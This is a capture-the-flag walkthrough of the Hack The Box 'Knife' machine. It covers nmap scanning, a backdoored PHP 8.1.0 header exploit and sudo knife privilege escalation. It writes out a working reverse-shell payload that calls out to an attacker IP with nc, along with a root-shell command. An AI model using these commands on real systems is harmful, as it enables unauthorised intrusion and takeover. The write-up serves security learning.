Knife

Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.242 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
As we see, only ports 22 (SSH) and 80 (HTTP) are open.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80 10.10.10.242 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
It seems like we are facing a web page. Let's take a look at it.

There is not much going on there. None of the buttons work, and there is no valuable information in the source code. Let's see what the Wappalyzer detects.

Exploitation
Wappalyzer detected that the website is running PHP 8.1.0. Let's search for any common exploit on exploit-db.
I found a RCE exploit, which basically add a new header to the GET requests in order to execute commands. It adds the User-Agentt header with the value zerodiumsystem('command');. Note that the new header is with double t.
To get a shell, first we have to set a netcat listener.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
If we send a GET request with the malicious header, we'll get a shell as the user james, and we'll be able to grab the user flag.
curl http://10.10.10.242 -H "User-Agentt: zerodiumsystem('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4444 >/tmp/f');"
-Hset the headers of the request.
Privilege Escalation
First of all, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
Let's see if the james user can run any command as any other user.
sudo -l
-llist user privileges.
We can execute the knife command as the root user. Let's see if there is any way of getting a shell as the root user.
If you search for the knife command in GTFOBins, you'll find that executing the following command, will spawn a shell as root. Then, all we have to do is reap the harvest and take the root flag.
sudo knife exec -E 'exec "/bin/bash"'
Last updated
Was this helpful?